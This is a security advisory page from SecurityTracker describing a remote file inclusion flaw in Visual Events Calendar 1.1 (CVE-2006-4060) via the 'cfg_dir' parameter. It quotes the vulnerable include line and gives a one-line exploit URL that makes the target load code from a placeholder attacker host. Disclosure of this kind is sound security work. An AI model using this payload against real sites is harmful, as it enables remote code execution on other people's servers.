SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   Application (Calendar)  >   Visual Events Calendar Vendors:   web-scripts.biz
Visual Events Calendar Include File Bug in 'cfg_dir' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016646
SecurityTracker URL:  http://securitytracker.com/id/1016646
CVE Reference:   CVE-2006-4060   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Aug 8 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1
Description:   A vulnerability was reported in Visual Events Calendar. A remote user can include and execute arbitrary code on the target system.

The 'calendar.php' script does not properly validate user-supplied input in the 'cfg_dir' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[path]/calendar.php?cfg_dir=http://evil_scripts?

xoron reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.web-scripts.biz/calendar.php (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Visual Events Calendar v1.1 (cfg_dir) Remote Inclusion Vulnerability

#title: Visual Events Calendar v1.1   (cfg_dir) Remote Inclusion Vulnerability


#Author: xoron


#script: Visual Events Calendar v1.1


#Class : Remote


#cont@ct: x0r0n[at]hotmail[dot]com


#CODE:    include $cfg_dir."customize_text.php";


#Exploit: http://www.site.com/[path]/calendar.php?cfg_dir=http://evil_scripts?


#Thanx : WWW.CYBER-WARRiOR.ORG


#Greetz: str0ke, ShiKaA , DJR , x-mastER ,R3D4c!D ,

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, SecurityGlobal.net LLC